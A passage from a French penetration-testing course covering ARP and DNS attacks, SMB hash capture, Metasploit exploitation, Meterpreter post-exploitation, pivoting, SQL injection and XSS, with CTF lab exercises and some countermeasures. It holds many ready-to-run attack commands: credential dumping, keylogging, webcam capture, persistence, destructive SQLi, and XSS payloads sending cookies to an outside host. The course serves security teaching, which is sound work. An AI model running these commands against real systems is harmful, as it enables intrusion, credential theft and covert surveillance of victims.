open Un service ecoute sur ce port Explorer le service, tester les vuln
closed Port accessible mais aucun service Surveiller (peut ouvrir plus tard)
filtered Firewall bloque les reponses Tester contournement (UDP, fragments)
unfiltered Accessible mais etat inconnu Utiliser d'autres types de scan
open|filtered Peut etre ouvert ou filtre (UDP typique) Tenter connexion directe
- 20 -
CYBERSECURITE - GUIDE COMPLET
closed|filtered Ferme ou filtre (scan idle) Verifier depuis un autre vecteur
CTF #02 - Cartographie Reseau Inconnue
Scenario
Vous demarrez une mission de pentest interne. Le seul element fourni est l'adresse reseau : [Link]/16.
Vous devez cartographier l'infrastructure, identifier les hotes actifs, les services exposes et trouver un flag
cache dans la banniere d'un service sur un port non-standard (>10000).
Objectifs
[1] Phase 1 : Ping scan pour identifier tous les hotes actifs
[2] Phase 2 : Scan -sV -sC sur les hotes decouverts
[3] Phase 3 : Scan complet -p- sur les hotes les plus interessants
[4] Phase 4 : Lire les bannieres des services (nc, netcat, telnet)
Outils suggeres
nmap -sn [Link]/16 -oG hotes_actifs.gnmap
grep 'Up' hotes_actifs.gnmap | awk '{print $2}' > [Link]
nmap -sV -sC -iL [Link] -T4 -oA scan_services
nc -nv
Indice
Scannez tous les ports avec -p- sur chaque hote. Les flags CTF sont souvent dans les bannieres de
services.
Format du flag
CTF{h0st_d1sc0v3ry_4nd_s3rv1c3_3num3r4t10n_m4st3r}
- 21 -
CYBERSECURITE - GUIDE COMPLET
MODULE 03
Securite des Protocoles Reseau
Les protocoles fondamentaux d'Internet ont ete concus sans securite. Ce module analyse leurs failles
intrinseques, demontre les attaques classiques et presente les contre-mesures adaptes a chaque
menace.
OBJECTIFS DU MODULE
✓ Comprendre les failles ARP, DNS, DHCP, HTTP et SMB
✓ Simuler une attaque Man-in-the-Middle (MITM) en lab
✓ Analyser et exploiter le SSL Stripping
✓ Mettre en place des contre-mesures reseau efficaces
✓ Utiliser Ettercap, Bettercap et Responder
3.1 ARP Poisoning — L'Attaque MITM par Excellence
ARP (Address Resolution Protocol) est un protocole sans etat et sans authentification. N'importe quel hote peut
envoyer une reponse ARP gratuite (Gratuitous ARP) pour modifier la table ARP de toute machine sur le meme
LAN. Cette vulnerabilite est la base de la majorite des attaques MITM sur reseau local.
# === SCHEMA DE L'ATTAQUE ARP POISONING ===
# Configuration normale :
Victime ([Link], MAC=AA) <--> Routeur ([Link], MAC=BB)
Table ARP victime : [Link] -> BB
Table ARP routeur : [Link] -> AA
# Apres ARP Poisoning :
Attaquant ([Link], MAC=CC) envoie :
-> a Victime : 'Je suis [Link], mon MAC=CC'
-> au Routeur : 'Je suis [Link], mon MAC=CC'
Table ARP victime : [Link] -> CC (FAUX !)
Table ARP routeur : [Link] -> CC (FAUX !)
=> Tout le trafic Victime <-> Routeur passe par l'Attaquant
# === OUTILS (LAB UNIQUEMENT) ===
# Activer l'IP forwarding (pour ne pas couper la connexion)
echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.ipv4.ip_forward=1
- 22 -
CYBERSECURITE - GUIDE COMPLET
# arpspoof (dsniff package)
sudo arpspoof -i eth0 -t [Link] [Link] # Empoisonner victime
sudo arpspoof -i eth0 -t [Link] [Link] # Empoisonner routeur
# Bettercap (plus moderne et complet)
sudo bettercap -iface eth0
[Link] on # Decouvrir hotes
[Link] on # Reconnaissance continue
[Link] [Link] # Cible
[Link] on # Lancer le poisoning
[Link] on # Capturer le trafic
# Ettercap — MITM avec interface graphique/texte
sudo ettercap -T -q -i eth0 -M arp:remote /[Link]// /[Link]//
# -T : text mode -q : quiet -M arp:remote : MITM ARP
Contre-mesures ARP Spoofing
Dynamic ARP Inspection (DAI) sur les switchs manages Cisco/HP
ip arp inspection vlan 1 (Cisco IOS)
Tables ARP statiques sur les hotes critiques :
arp -s [Link] BB:BB:BB:BB:BB:BB (Linux)
Monitoring ARP avec arpwatch : apt install arpwatch
sudo arpwatch -i eth0 -m admin@[Link]
XArp (Windows/Linux) : detection en temps reel du ARP spoofing
Chiffrer tout le trafic (TLS/SSH) - le MITM devient inutile si chiffre
3.2 DNS Attacks — Poisoning, Tunneling, Hijacking
Attaque DNS Mecanisme Impact Detection
DNS Spoofing Reponse DNS falsifiee (race condition)
Redirection utilisateur Alertes DNSSEC
Cache Poisoning Corrompre le cache d'un resolveurImpact massif clients Monitoring TTL anormal
DNS Tunneling Exfiltrer des donnees via requetesContourner
DNS firewalls Entropie elevee des noms
Zone Transfer Dump complet des enregistrements
Cartographie
DNS interne Logs axfr sur serveur DNS
DNS Amplification DDoS : petite requete, grosse reponse
DDoS sur cibles tierces Monitoring volumetrique
NXDOMAIN Flood Saturer le resolveur de requetes fakes
DoS resolveur DNS Nombre NXDOMAIN/sec
DNS Rebinding Modifier le TTL pour bypasser SOP
Attaque applications web CSP + validation cote serveur
# === ENUMERATION DNS (pentest) ===
- 23 -
CYBERSECURITE - GUIDE COMPLET
dnsrecon -d [Link] -t std # Enregistrements standards
dnsrecon -d [Link] -t brt -D
/usr/share/wordlists/seclists/Discovery/DNS/[Link]
dnsenum --enum [Link]
# Test de Zone Transfer
dig axfr @[Link] [Link] # Si vuln: dump complet de la zone
host -l [Link] [Link]
# DNS Tunneling — detection
# Signes : noms tres longs, haute entropie, fort volume de requetes DNS
# Outil d'analyse : dnstop, PassiveDNS, Zeek
dnstop -l 10 eth0 # Top domaines en temps reel
# Iodine — DNS tunneling (lab)
# Serveur : iodined -f -c -P motdepasse [Link] [Link]
# Client : iodine -f -P motdepasse [Link]
# DNSSEC — verification
dig +dnssec [Link] A # Chercher flags AD, DO
delv @[Link] +rtrace [Link] # Validation complete chaine
3.3 SMB — Attaques Windows les Plus Critiques
SMB (Server Message Block) est le protocole de partage de fichiers Windows. Il a ete la source de
vulnerabilites majeures (MS08-067, MS17-010/EternalBlue, PrintNightmare). La capture et le crackage des
hash NTLM via Responder est une technique incontournable en pentest Active Directory.
# === ENUMERATION SMB ===
nmap -sV -p 139,445 [Link]
nmap --script smb-enum-shares,smb-enum-users -p 445 [Link]
nmap --script smb-os-discovery -p 445 [Link]
nmap --script smb-security-mode -p 445 [Link]
# Enumération avec smbclient
smbclient -L //[Link] -N # Lister shares (null session)
smbclient //[Link]/share -N # Connexion anonyme
smbclient //[Link]/share -U admin # Avec credentials
# enum4linux — enumeration SMB/LDAP
enum4linux -a [Link]
enum4linux -u admin -p password -a [Link]
# Vérifier EternalBlue (MS17-010)
nmap --script smb-vuln-ms17-010 -p 445 [Link]
- 24 -
CYBERSECURITE - GUIDE COMPLET
# === RESPONDER — Capture de hashes NTLM ===
sudo responder -I eth0 -wrf
# -w : WPAD -r : NBT-NS/LLMNR -f : fingerprint
# Intercepte les authentifications NTLM sur le LAN
# Les hashes sont stockes dans /usr/share/responder/logs/
# Cracker les hashes NTLMv2 avec hashcat
hashcat -m 5600 [Link] /usr/share/wordlists/[Link]
hashcat -m 5600 [Link] /usr/share/wordlists/[Link] --rules-file [Link]
# Pass-the-Hash (si on a le hash NTLM)
pth-smbclient //[Link]/C$ -U
'DOMAIN/Administrator%aad3b435b51404eeaad3b435b51404ee:<NTLM_HASH>'
impacket-psexec administrator@[Link] -hashes :<NTLM_HASH>
3.4 SSL Stripping et Attaques TLS
# === TEST DE CONFIGURATION TLS ===
[Link] [Link]
[Link] --severity HIGH [Link]
# Avec nmap
nmap --script ssl-enum-ciphers -p 443 [Link]
nmap --script ssl-cert,ssl-known-key -p 443 [Link]
# Verifier la chaine de certificats
openssl s_client -connect [Link] -showcerts
openssl s_client -connect [Link] </dev/null | openssl x509 -noout -text
# Verifier la date d'expiration
echo | openssl s_client -servername [Link] -connect [Link] 2>/dev/null |
openssl x509 -noout -dates
# === HEADERS DE SECURITE HTTP ===
curl -I [Link]
# Verifier la presence de :
# Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
# Content-Security-Policy: default-src 'self'
# X-Frame-Options: DENY
# X-Content-Type-Options: nosniff
# Referrer-Policy: strict-origin-when-cross-origin
# Permissions-Policy: geolocation=(), microphone=()
# Nikto — scanner de securite web
- 25 -
CYBERSECURITE - GUIDE COMPLET
nikto -h [Link]
nikto -h [Link] -ssl -port 443
CTF #03 - MITM Coffee Shop
Scenario
Votre lab simule un reseau Wi-Fi public dans un cafe. Deux machines virtuelles communiquent : une
'victime' qui se connecte a un site HTTP non securise avec ses credentials, et un 'routeur'. Votre mission :
position MITM + interception.
Objectifs
[1] Identifier les hotes sur le reseau de lab (nmap -sn)
[2] Lancer le ARP poisoning (bettercap ou arpspoof)
[3] Activer la capture de trafic (Wireshark ou [Link] bettercap)
[4] Extraire les credentials HTTP POST interceptes
[5] Identifier le cookie de session et documenter l'attaque
Outils suggeres
sudo bettercap -iface eth0
[Link] on && [Link] && [Link] on && [Link] on
Wireshark : filtre '[Link] == POST'
Indice
N'oubliez pas d'activer ip_forward avant arpspoof ou bettercap le fait automatiquement.
Format du flag
CTF{m1tm_c0ff33_cr3d3nt14ls_st0l3n_n0_https}
- 26 -
CYBERSECURITE - GUIDE COMPLET
MODULE 04
Analyse de Vulnerabilites
Identifier et classer les failles de securite avant qu'un attaquant ne le fasse. Ce module couvre la
methodologie de scan, l'interpretation des resultats et la validation manuelle des vulnerabilites.
OBJECTIFS DU MODULE
✓ Maitriser le systeme de notation CVE/CVSS v3.1
✓ Utiliser OpenVAS et Nessus pour des scans automatises
✓ Utiliser Searchsploit et ExploitDB efficacement
✓ Valider manuellement les resultats de scan (eviter les faux positifs)
✓ Rediger un rapport de vulnerabilites professionnel
4.1 CVE, CWE et CVSS — Le Vocabulaire des Vulnerabilites
Referentiel Signification Exemple
CVE Common Vulnerabilities & Exposures — ID unique CVE-2017-0144 (EternalBlue)
CWE Common Weakness Enumeration — type de faille CWE-89 (Injection SQL)
CVSS Score de severite 0-10 (version 3.1) CVSS:9.8 = Critique
EPSS Probabilite d'exploitation (0-100%) EPSS: 0.97 = 97% risque
KEV Known Exploited Vulnerabilities (CISA) Liste CVE activement exploitees
NVD National Vulnerability Database (NIST) [Link] — base complete
Vecteurs CVSS v3.1 — Comprendre le score :
Metrique CVSS Options possibles Impact sur le score
Attack Vector (AV) Network / Adjacent / Local / Physical Network = score max
Attack Complexity (AC) Low / High Low = score plus eleve
Privileges Required (PR) None / Low / High None = plus dangereux
User Interaction (UI) None / Required None = plus dangereux
Scope (S) Unchanged / Changed Changed = impact etendu
Confidentiality (C) None / Low / High High = score max
Integrity (I) None / Low / High High = score max
Availability (A) None / Low / High High = score max
- 27 -
CYBERSECURITE - GUIDE COMPLET
Score CVSS Severite Delai de correction recommande Exemple
9.0 - 10.0 CRITIQUE Immediate (24-48h) RCE sans authentification
7.0 - 8.9 ELEVE Sous 7 jours Elevation de privileges locale
4.0 - 6.9 MOYEN Sous 30 jours XSS reflechi, info disclosure
0.1 - 3.9 FAIBLE Prochain cycle de patching Banniere version exposee
0.0 AUCUN Informatif Bonne pratique manquante
4.2 Searchsploit et ExploitDB
# === SEARCHSPLOIT — CLI pour [Link] ===
searchsploit apache 2.4
searchsploit windows smb
searchsploit -t 'remote code execution' # Chercher dans le titre uniquement
searchsploit wordpress 5.8
# Examiner un exploit
searchsploit -x 50383 # Afficher le code de l'exploit #50383
searchsploit -m 50383 # Copier localement
searchsploit -p 50383 # Afficher le chemin complet
# Mise a jour de la base
sudo searchsploit --update
# Recherche par CVE
searchsploit --cve CVE-2021-41773
# === MSFSEARCH — Chercher dans Metasploit ===
msfconsole -q -x 'search type:exploit apache 2.4; exit'
# === AUTRES RESSOURCES ===
# [Link]
# [Link]
# [Link]
# [Link] (environnements Docker pour tester)
4.3 OpenVAS / Greenbone — Scanner Open Source
# === INSTALLATION ET SETUP ===
sudo apt install gvm -y
sudo gvm-setup # Premier lancement (15-30 min)
sudo gvm-check-setup # Verification
sudo gvm-start # Demarrer les services
- 28 -
CYBERSECURITE - GUIDE COMPLET
# Interface web : [Link]
# Login : admin / <mot_de_passe_genere_par_gvm-setup>
# === CLI avec gvm-cli ===
sudo gvm-cli socket --gmp-username admin --gmp-password PASS \
--xml '<get_version/>'
# Creer une cible
sudo gvm-cli socket --gmp-username admin --gmp-password PASS \
--xml '<create_target><name>Cible
Lab</name><hosts>[Link]/24</hosts></create_target>'
# === WORKFLOW COMPLET INTERFACE WEB ===
1. Configuration -> Targets -> New Target
(definir IP/subnet, credentials SSH/SMB optionnels)
2. Scans -> Tasks -> New Task
(selectionner cible, scanner, politique : Full and Fast)
3. Lancer le scan et surveiller l'avancement
4. Resultats -> filtrer par severite (Critical/High en premier)
5. Rapports -> telecharger en PDF/HTML/XML
# === INTERPRETATION DES RESULTATS ===
# - Lire le QoD (Quality of Detection) : 70%+ = fiable
# - Verifier chaque Critical manuellement avant exploitation
# - Les faux positifs sont frequents sur les versions bannières
4.4 Validation Manuelle — Eviter les Faux Positifs
# === VALIDATION MANUELLE D'UNE CVE ===
# Exemple : CVE-2021-41773 (Apache Path Traversal)
# 1. Verifier la version du service
curl -I [Link] | grep Server
nmap -sV -p 80 [Link]
# 2. Tenter le PoC manuellement
curl '[Link]
# 3. Comparer avec le resultat attendu (CVE description sur NVD)
# === VALIDATION HEARTBLEED (CVE-2014-0160) ===
nmap --script ssl-heartbleed -p 443 [Link]
# Ou : python heartbleed_poc.py [Link]
# === VALIDATION SHELLSHOCK (CVE-2014-6271) ===
- 29 -
CYBERSECURITE - GUIDE COMPLET
curl -H 'User-Agent: () { :; }; echo; /bin/cat /etc/passwd'
[Link]
# === BANNIERE GRABBING — identifier version sans scan ===
nc -nv [Link] 22 # Banniere SSH
nc -nv [Link] 21 # Banniere FTP
nc -nv [Link] 25 # Banniere SMTP
curl -v [Link] # Headers HTTP complets
telnet [Link] 110 # Banniere POP3
CTF #04 - Vuln Hunter
Scenario
Une machine Windows Server 2019 est exposee dans votre lab. Effectuez un scan de vulnerabilites
complet, identifiez les CVE critiques et validez manuellement les trois plus importantes. Documentez vos
trouvailles comme dans un vrai rapport.
Objectifs
[1] Lancer un scan OpenVAS ou Nessus sur la cible
[2] Lister les CVE avec score CVSS >= 7.0
[3] Valider les 3 CVE les plus critiques manuellement (nmap scripts, PoC)
[4] Identifier la CVE permettant un acces sans authentification
[5] Recuperer le flag dans C:\[Link] apres exploitation
Outils suggeres
sudo gvm-start puis scanner via [Link]
nmap --script vuln -p- [Link]
searchsploit
Indice
Cherchez notamment les services web sur des ports non-standard et les partages SMB.
Format du flag
CTF{CVE_hunt3r_v4l1d4t3d_4nd_3xpl01t3d}
- 30 -
CYBERSECURITE - GUIDE COMPLET
MODULE 05
Exploitation & Post-Exploitation
Du scan au shell — comprendre et maitriser le framework Metasploit, les techniques de
post-exploitation et les fondamentaux du pivoting.
OBJECTIFS DU MODULE
✓ Maitriser l'architecture et le workflow de Metasploit
✓ Configurer et lancer des exploits contre des cibles vulnerables
✓ Utiliser Meterpreter pour la post-exploitation avancee
✓ Comprendre et realiser une elevation de privileges
✓ Effectuer un pivot vers un sous-reseau inaccessible
✓ Maintenir la persistance de maniere discrette
5.1 Metasploit Framework — Architecture Complete
Composant Description Exemples
Exploits Code d'exploitation d'une CVE specifique ms17_010_eternalblue, ms08_067_netapi
Payloads Code execute sur la cible apres exploit meterpreter/reverse_tcp, shell/bind_tcp
Auxiliary Scan, fuzzing, DoS, brute force scanner/portscan/tcp, auxiliary/fuzz/http
Post Actions apres compromission post/multi/recon/local_exploit_suggester
Encoders Obfusquer le payload (bypass AV) x86/shikata_ga_nai, x64/xor_dynamic
Evasion Techniques anti-detection avancees windows/windows_defender_exe
Nops Sleds NOP pour alignement memoire x86/single_byte
Plugins Extensions MSF (aggregation, reporting) plugin/nessus, plugin/db_autopwn
Types de payloads :
Type Description Quand utiliser
Singles Payload autonome tout-en-un Simple, mais limite en taille
Stagers Petit loader qui telecharge le stage Bypass de taille (ShellCode limite)
Stages Payload complet charge par le stager Meterpreter, VNC...
reverse_tcp Cible se connecte a l'attaquant Contourne firewalls entrants
bind_tcp Attaquant se connecte a la cible Si l'attaquant est derriere NAT
- 31 -
CYBERSECURITE - GUIDE COMPLET
reverse_https Tunnel HTTPS vers attaquant Evasion IDS/proxy
reverse_http Tunnel HTTP vers attaquant Si HTTPS bloque
# === WORKFLOW METASPLOIT COMPLET ===
# 1. Lancer msfconsole
msfconsole -q # Mode silencieux
msfconsole -r [Link] # Executer un resource script
# 2. Connexion a la base de donnees (optionnel mais recommande)
msf6 > db_status
msf6 > workspace -a pentest_client
msf6 > db_nmap -sV -O [Link] # Nmap importe dans la BDD
msf6 > hosts # Voir les hotes
msf6 > services # Voir les services
msf6 > vulns # Voir les vulns detectees
# 3. Chercher un module
msf6 > search eternalblue
msf6 > search type:exploit platform:windows smb
msf6 > search cve:2021-44228 # Log4Shell
# 4. Selectionner et configurer
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > info # Documentation complete
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS [Link]
msf6 exploit(ms17_010_eternalblue) > set LHOST [Link]
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 5. Verifier AVANT d'exploiter
msf6 exploit(ms17_010_eternalblue) > check
# 6. Exploiter
msf6 exploit(ms17_010_eternalblue) > run
msf6 exploit(ms17_010_eternalblue) > exploit -j # En arriere-plan (job)
# 7. Gerer les sessions
msf6 > sessions -l # Lister toutes les sessions
msf6 > sessions -i 1 # Interagir avec session 1
msf6 > sessions -k 1 # Tuer la session 1
msf6 > sessions -u 1 # Upgrader shell -> meterpreter
- 32 -
CYBERSECURITE - GUIDE COMPLET
5.2 Meterpreter — Reference Complete
# === INFORMATION GATHERING ===
meterpreter > sysinfo # OS, hostname, architecture
meterpreter > getuid # Utilisateur courant
meterpreter > getpid # PID du processus actuel
meterpreter > ps # Lister tous les processus
meterpreter > pgrep [Link] # Trouver PID d'un process
meterpreter > ipconfig / ifconfig # Interfaces reseau
meterpreter > route # Table de routage
meterpreter > arp # Table ARP
meterpreter > netstat # Connexions reseau actives
meterpreter > env # Variables d'environnement
# === ELEVATION DE PRIVILEGES ===
meterpreter > getprivs # Privileges actuels
meterpreter > getsystem # Essayer de devenir SYSTEM
# Methodes : Named Pipe, Token Duplication...
meterpreter > run post/multi/recon/local_exploit_suggester
# Suggere des exploits d'elevation de privileges locaux
# === EXTRACTION DE CREDENTIALS ===
meterpreter > hashdump # Hashes NTLM (necessite SYSTEM)
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > load kiwi # Charger Mimikatz
meterpreter > kiwi_cmd sekurlsa::logonpasswords # Mots de passe en clair
meterpreter > lsa_dump_sam # SAM database
meterpreter > lsa_dump_secrets # LSA secrets
# === INTERACTION SYSTEME ===
meterpreter > shell # Shell systeme ([Link])
meterpreter > execute -f [Link] -i -H # Executer commande cachee
meterpreter > migrate <PID> # Migrer vers un autre process
# Ex: migrer vers [Link] pour la persistance
meterpreter > screenshot # Capture d'ecran
meterpreter > record_mic -d 30 # Enregistrer micro 30s
meterpreter > webcam_snap # Photo webcam
# === KEYLOGGER ===
meterpreter > keyscan_start # Demarrer keylogger
meterpreter > keyscan_dump # Recuperer les touches
meterpreter > keyscan_stop # Arreter
- 33 -
CYBERSECURITE - GUIDE COMPLET
# === FICHIERS ===
meterpreter > ls / dir # Lister fichiers
meterpreter > cat /etc/passwd # Lire fichier
meterpreter > upload /local/file /remote/path # Uploader
meterpreter > download /remote/file /local/path # Telecharger
meterpreter > search -f *.txt -d C:\ # Chercher fichiers
# === PERSISTANCE ===
meterpreter > run post/windows/manage/persistence_exe
meterpreter > run post/linux/manage/sshkey_persistence
# Ajoute une cle SSH autorisee pour acces futur
5.3 Pivoting — Atteindre les Reseaux Internes
Le pivoting consiste a utiliser une machine compromise comme relais pour acceder a des segments reseau
inaccessibles depuis notre machine d'attaque. Technique fondamentale en pentest d'infrastructure et Active
Directory.
# === SCENARIO DE PIVOTING ===
# Attaquant ([Link]) -> Machine compromise ([Link] / [Link])
# -> Reseau interne ([Link]/24) inaccessible
# === METHODE 1 : AUTOROUTE + SOCKS (Metasploit) ===
# Sur la session meterpreter
meterpreter > run post/multi/manage/autoroute -s [Link]/24
meterpreter > background
# Configurer un proxy SOCKS
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j
# Configurer proxychains (/etc/[Link])
# socks5 [Link] 1080
proxychains nmap -sT -p 80,443,445 [Link]
proxychains firefox &
# === METHODE 2 : TUNNEL SSH ===
# Port forwarding local
ssh -L 8080:[Link]:80 user@[Link]
# Maintenant localhost:8080 pointe vers [Link]:80
# Dynamic port forwarding (proxy SOCKS via SSH)
- 34 -
CYBERSECURITE - GUIDE COMPLET
ssh -D 1080 user@[Link]
proxychains nmap -sT [Link]/24
# Reverse port forwarding (si machine interne ne peut pas sortir)
ssh -R 4444:localhost:4444 user@[Link]
# === METHODE 3 : CHISEL (HTTP tunnel) ===
# Serveur (attaquant)
./chisel server -p 8080 --reverse
# Client (machine compromise)
./chisel client [Link]:8080 R:socks
# proxychains pointe vers [Link]:1080
CTF #05 - Root le Lab
Scenario
Metasploitable 2 est disponible dans votre lab. Elle contient intentionnellement de nombreux services
vulnerables. Votre objectif est d'obtenir un acces root en exploitant vsftpd 2.3.4 et de demonstrer deux
techniques de post-exploitation.
Objectifs
[1] Scanner Metasploitable 2 et identifier tous les services (nmap -sV -sC -p-)
[2] Exploiter la backdoor vsftpd 2.3.4 (port 21) via Metasploit
[3] Obtenir un shell, upgrader en meterpreter si possible
[4] Realiser un hashdump des utilisateurs
[5] Utiliser local_exploit_suggester pour identifier d'autres vecteurs
Outils suggeres
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS
run
Indice
vsftpd 2.3.4 backdoor se declenche en envoyant ':)' dans le champ username sur le port 21.
Format du flag
CTF{vsftpd_b4ckd00r_r00t_m3t4spl01t4bl3}
- 35 -
CYBERSECURITE - GUIDE COMPLET
MODULE 06
Securite des Applications Web
Les applications web sont la premiere surface d'attaque des organisations. Ce module couvre le Top
10 OWASP, les techniques d'exploitation web et l'utilisation de Burp Suite comme proxy
d'interception.
OBJECTIFS DU MODULE
✓ Maitriser le Top 10 OWASP 2021
✓ Exploiter SQLi (basique et aveugle), XSS, IDOR, SSRF, LFI/RFI
✓ Utiliser Burp Suite comme proxy d'interception et outil de fuzzing
✓ Enumerer les endpoints et repertoires caches (gobuster, ffuf)
✓ Comprendre et appliquer les corrections securisees
6.1 OWASP Top 10 2021 — Details et Exploitation
Rang Categorie Description et vecteur d'attaque
A01 Broken Access Control IDOR, path traversal, acces a ressources non autorisees
A02 Cryptographic Failures Donnees sensibles en clair, MD5/SHA1, certs invalides
A03 Injection SQLi, OS command injection, LDAP injection, NoSQLi
A04 Insecure Design Logique metier cassee, absence de threat modeling
A05 Security Misconfiguration Config par defaut, debug active, headers manquants
A06 Vulnerable Components Librairies avec CVE, dependances non mises a jour
A07 Auth & Session Failures Brute force, tokens faibles, session fixation
A08 Integrity Failures CI/CD compromis, deserialisation non securisee
A09 Logging Failures Pas de logs sur actions critiques, logs insuffisants
A10 SSRF Requetes vers ressources internes via le serveur
6.2 SQL Injection — De la Base a l'Avancee
# === TEST MANUEL SQLi ===
# Payloads de detection basiques
' OR '1'='1
' OR 1=1 --
admin'--
- 36 -
CYBERSECURITE - GUIDE COMPLET
' OR '1'='1'--
') OR ('1'='1
1; DROP TABLE users;--
# === SQLMAP — AUTOMATISATION COMPLETE ===
# Test de base sur parametre GET
sqlmap -u '[Link]
# Test sur formulaire POST
sqlmap -u '[Link] --data='username=admin&password=test'
# Depuis une requete Burp (interceptee et sauvegardee)
sqlmap -r [Link]
# Enumerer les bases de donnees
sqlmap -u '[Link] --dbs
# Enumerer les tables d'une BDD
sqlmap -u '[Link] -D mydb --tables
# Dumper une table
sqlmap -u '[Link] -D mydb -T users --dump
# Acces OS (si MySQL avec FILE privilege)
sqlmap -u '[Link] --os-shell
# Bypass WAF
sqlmap -u '[Link] --tamper=space2comment,between
# === REMEDIATION ===
# PHP PDO (requetes preparees)
$stmt = $pdo->prepare('SELECT * FROM users WHERE username = ? AND password = ?');
$stmt->execute([$username, $password]);
# Python SQLAlchemy (ORM securise)
user = [Link](User).filter([Link] == username).first()
6.3 XSS — Cross-Site Scripting Complet
Type XSS Persistance Mecanisme Impact
Reflechi Non Parametre URL -> page immediat Phishing, vol session
Stocke Oui Payload en BDD, affiche plus tard Impact massif, persistant
DOM-based Variable Manipulation du DOM JS cote client Depends du contexte
Blind XSS Oui Admin/logs voient le payload ATO admin, SSRF interne
# === PAYLOADS XSS PAR CONTEXTE ===
- 37 -
CYBERSECURITE - GUIDE COMPLET
# Contexte HTML simple
<script>alert([Link])</script>
<img src=x onerror='fetch("[Link]
# Contexte attribut HTML
" onmouseover="alert(1)
' onfocus='alert(1)' autofocus='
# Bypass de filtres
<ScRiPt>alert(1)</sCrIpT> # Casse mixte
<svg/onload=alert(1)> # SVG
<iframe src='javascript:alert(1)'>
<details open ontoggle=alert(1)>
# Vol de cookie complet (payload stored XSS)
<script>new
Image().src='[Link]
# XSS Hunter (blind XSS)
# Creer un payload sur [Link], l'injecter dans un champ admin
# === OUTILS ===
# XSStrike — fuzzer XSS intelligent
python3 [Link] -u '[Link]
# Dalfox — scanner XSS rapide
dalfox url '[Link]
# === REMEDIATION ===
# PHP : htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
# JS : [Link](userInput)
# CSP : Content-Security-Policy: default-src 'self'; script-src 'self'
6.4 Burp Suite — Guide Complet
# === CONFIGURATION DU PROXY ===
# 1. Burp Suite -> Proxy -> Options -> Listener : [Link]:8080
# 2. Navigateur -> Parametres proxy -> Manuel -> [Link]:8080
# 3. Importer le certificat Burp CA dans le navigateur
# [Link] -> Download CA Certificate
# === INTERCEPTER ET MODIFIER UNE REQUETE ===
# Proxy -> Intercept -> On
# Naviguer sur le site -> la requete est bloquee dans Burp
# Modifier les parametres -> Forward
- 38 -
CYBERSECURITE - GUIDE COMPLET
# === REPEATER — Rejouer des requetes ===
# Clic droit sur une requete -> Send to Repeater (Ctrl+R)
# Modifier et rejouer autant de fois que necessaire
# === INTRUDER — Fuzzing et brute force ===
# Clic droit -> Send to Intruder (Ctrl+I)
# Positions : marquer les parametres a fuzz (§valeur§)
# Payloads : wordlist, nombres, dates...
# Types d'attaques :
# Sniper : 1 parametre, 1 payload a la fois
# Battering ram : tous params, meme payload
# Pitchfork : N params, N wordlists (meme index)
# Cluster bomb : N params, produit cartesien des wordlists
# === SCANNER (Pro uniquement) ===
# Target -> Site map -> Clic droit -> Actively scan
# === DECODER ===
# Decoder -> encoder/decoder Base64, URL, HTML, Hex, Gzip
# === FFUF — Fuzzing rapide en CLI ===
ffuf -u [Link] -w
/usr/share/wordlists/seclists/Discovery/Web-Content/[Link]
ffuf -u [Link] -w [Link] -fc 404 # Filtrer 404
ffuf -u [Link] -w [Link] -fw 100
# Gobuster — enumeration repertoires
gobuster dir -u [Link] -w
/usr/share/wordlists/seclists/Discovery/Web-Content/[Link]
gobuster dir -u [Link] -w [Link] -x php,html,js,txt
CTF #06 - DVWA Challenge
Scenario
DVWA (Damn Vulnerable Web App) est disponible sur [Link] Completez les 3 niveaux de difficulte
des challenges SQLi et XSS.
Objectifs
[1] Niveau Low : exploiter la SQLi basique (parametre id)
[2] Niveau Medium : bypasser les filtres de base avec sqlmap --tamper
[3] Niveau Low : injecter un XSS stocke dans le champ commentaire
[4] Niveau High : bypasser le filtre XSS avec un payload avance
[5] Extraire tous les passwords de la table users de la BDD
Outils suggeres
- 39 -
CYBERSECURITE - GUIDE COMPLET
sqlmap -u '[Link] --cookie='...'
Burp Suite pour intercepter et analyser les requetes
XSStrike pour les bypasses XSS
Indice
Notez le cookie PHPSESSID et security dans vos requetes sqlmap. DVWA necessite une auth.
Format du flag
CTF{dvw4_sql1_xss_3xpl01t3d_4ll_l3v3ls}
- 40 -
CYBERSECURITE - GUIDE COMPLET
MODULE 07
Cryptographie Appliquee
Des bases mathematiques a l'attaque pratique. Ce module couvre les algorithmes de chiffrement,
PKI, et les techniques de CTF crypto.
OBJECTIFS DU MODULE
✓ Comprendre le chiffrement symetrique (AES, ChaCha20)
✓ Maitriser le chiffrement asymetrique (RSA, ECDSA)
✓ Analyser et attaquer les implementations faibles
✓ Identifier et exploiter les erreurs cryptographiques courantes
✓ Resoudre les challenges CTF crypto (Caesar, XOR, RSA faible)
7.1 Chiffrement Symetrique
Algorithme Taille cle Mode securise Statut Usage
AES-128 128 bits GCM, CCM Securise TLS, chiffrement fichiers
AES-256 256 bits GCM, CCM Recommande VPN, chiffrement disque
ChaCha20-Poly 256 bits Poly1305 MAC Recommande TLS 1.3, mobile
3DES 112/168 bits CBC Deprecie Legacy uniquement
DES 56 bits - Casse N'utilisez jamais
RC4 40-2048 bits - Casse WEP (vuln), TLS < 1.2
Blowfish 32-448 bits CBC Obsolete bcrypt (KDF seulement)
Modes d'operation AES — Pourquoi le mode compte :
Mode Intergite Authentification Parallelisable A utiliser ?
ECB Non (patterns) Non Oui JAMAIS (patterns visibles)
CBC Oui (si IV ok) Non Dechiffrement Eviter (BEAST, padding oracle)
CTR Oui Non Oui Si MAC separe (HMAC)
GCM Oui (AEAD) Oui (tag 128b) Oui RECOMMANDE
CCM Oui (AEAD) Oui Non OK (IoT, embedded)
7.2 Chiffrement Asymetrique et PKI
- 41 -
CYBERSECURITE - GUIDE COMPLET
# === RSA — OPERATIONS DE BASE ===
# Generer une paire de cles RSA 4096 bits
openssl genrsa -out [Link] 4096
